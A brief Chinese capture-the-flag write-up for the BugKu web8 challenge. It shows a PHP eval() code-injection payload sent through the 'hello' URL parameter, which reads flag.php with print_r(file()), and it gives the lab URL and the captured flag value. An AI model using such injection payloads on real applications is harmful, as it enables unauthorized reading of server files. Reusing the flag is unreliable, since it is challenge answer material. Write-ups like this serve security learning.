[Web]BugKu-web8


刚看懂eval函数,结合之前的题我猜想是非常简单的

于是我eval里传了$flag

??竟然给我一个图样图森破?

考虑怎么搞到flag.php。

哦天啊eval都给我了,我竟然还不会搞flag

找了一下相关的读文件函数,最后觉得还是file最好用

payload如下:

http://114.67.246.176:16245/?hello=);print_r(file(%22./flag.php%22)

要注意与eval中括号的匹配, %22是引号。

Flag:

flag{1b2569215e6c8ebe90eb307f86c41109}

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注